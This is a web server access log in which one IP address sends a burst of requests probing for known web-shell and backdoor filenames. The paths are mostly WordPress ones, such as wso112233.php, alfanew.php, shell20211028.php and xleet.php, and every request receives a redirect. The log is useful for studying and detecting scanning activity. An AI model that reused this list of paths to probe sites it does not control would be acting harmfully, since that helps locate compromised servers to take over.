185.241.208.231 - - [12/Aug/2025:07:06:47 +0300] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:49 +0300] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:56 +0300] "GET /wp-admin/network/index.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:39 +0300] "GET /wp-head.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:41 +0300] "GET /wp-content/languages/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:43 +0300] "GET /wp-includes/wp-class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:51 +0300] "GET /fm1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:06:53 +0300] "GET /baxa1.phP8 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:02 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:06 +0300] "GET /wp-admin/images/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:11 +0300] "GET /alfanew.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:13 +0300] "GET /wp-content/themes/worship/block-css.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:15 +0300] "GET /.well-known/wso112233.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:20 +0300] "GET /repeater.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:22 +0300] "GET /wp-content/themes/finley/min.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:26 +0300] "GET /dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:27 +0300] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:29 +0300] "GET /shell20211028.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:32 +0300] "GET /wp-admin/css/colors/index.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:00 +0300] "GET /wp-file.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:04 +0300] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:08 +0300] "GET /wp-content/themes/fremo/mobile.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:10 +0300] "GET /wp-content/themes/suntech/css_blocks.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:17 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:19 +0300] "GET /wp-content/shell20211028.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:24 +0300] "GET /wso112233.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:34 +0300] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:39 +0300] "GET /themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:40 +0300] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:45 +0300] "GET /.well-known/pki-validation/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:46 +0300] "GET /wp-content/themes/aahana/json.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:48 +0300] "GET /edit.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:50 +0300] "GET /wp-header.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:54 +0300] "GET /404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:01 +0300] "GET /file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:42 +0300] "GET /wp-content/plugins/core-stab/alogs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:51 +0300] "GET /.well-known/pki-validation/?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:53 +0300] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:56 +0300] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:57 +0300] "GET /alfanew.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:07:59 +0300] "GET /bypass.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
101.99.88.90 - - [12/Aug/2025:07:08:02 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.241.208.231 - - [12/Aug/2025:07:08:03 +0300] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:07 +0300] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:12 +0300] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:15 +0300] "GET /wp-content/plugins/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:22 +0300] "GET /wp-admin/network/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:25 +0300] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:30 +0300] "GET /xleet.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:32 +0300] "GET /wp-content/uploads/2024/index.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:35 +0300] "GET /wp-admin/network/class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:05 +0300] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:10 +0300] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:13 +0300] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:17 +0300] "GET /contact.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:19 +0300] "GET /wp-links.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:21 +0300] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:24 +0300] "GET /wp-content/plugins/linkpreview/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:27 +0300] "GET /settings.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:38 +0300] "GET /chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:45 +0300] "GET /bless.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:46 +0300] "GET /wp-content/plugins/atomlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:49 +0300] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:50 +0300] "GET /ini.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:53 +0300] "GET /wp-admin/network/ayk.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:55 +0300] "GET /ayk.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:58 +0300] "GET /bak.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:09:00 +0300] "GET /admin.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:09:01 +0300] "GET /wp-admin/css/colors/blue/?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:37 +0300] "GET /class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:40 +0300] "GET /simple.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:41 +0300] "GET /wp-admin/network/MdFvb.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:43 +0300] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
185.241.208.231 - - [12/Aug/2025:07:08:52 +0300] "GET /wp-content/themes/hello-element/footer.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"